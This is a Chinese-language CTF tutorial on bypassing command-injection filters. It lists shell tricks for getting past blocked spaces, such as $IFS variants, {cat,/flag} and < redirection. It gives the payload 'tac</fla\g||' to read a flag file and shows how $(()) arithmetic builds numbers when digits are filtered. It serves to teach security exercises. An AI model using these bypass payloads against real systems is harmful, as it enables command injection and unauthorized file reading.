@TOC

🍀预计时间：25分钟
学习目标：
1继续了解如何绕过过滤
2学会构造数字
⚠别看今天目标少，内容需要思考滴！！！

过滤cat，flag，空格，数字，$

承接上文，我们介绍了如何绕过过滤cat，flag等，可是如果同时过滤了空格和$我们该怎么办呢？？？

明显，$IFS我们用不了了，所以这里再介绍几个绕过空格的方法：
==$IFS==
==$IFS$1==
==${IFS}==
=={,}:例如{cat,/flag}==
==<==
==<>==

这道题我们使用<来作答

传参tac</fla\g||就可以得到flag了！！！

构造数字（这个比较难搞，所以重点介绍下）

==在linux shell中 $(()) 用来计算数学表达式==
例如：
echo $(()) 0
echo $((~$(()))) -1
echo $((~$(())))$((~$(())))$((~$(()))) -1-1-1
echo $((~$(($((~$(())))$((~$(())))$((~$(()))))))) 2
echo $(($((~$(())))$((~$(())))$((~$(()))))) -3
有没有发现规律？？？
很明显，如果括号内不加表达式就是0，取反就是-1，我们可以把它们拼接在一起（-1-1-1），也可以加在一起（-3）

🏆🏆结束语：
==命令执行漏洞的内容会不定期更新，如果对您有帮助的话可以订阅一下专栏==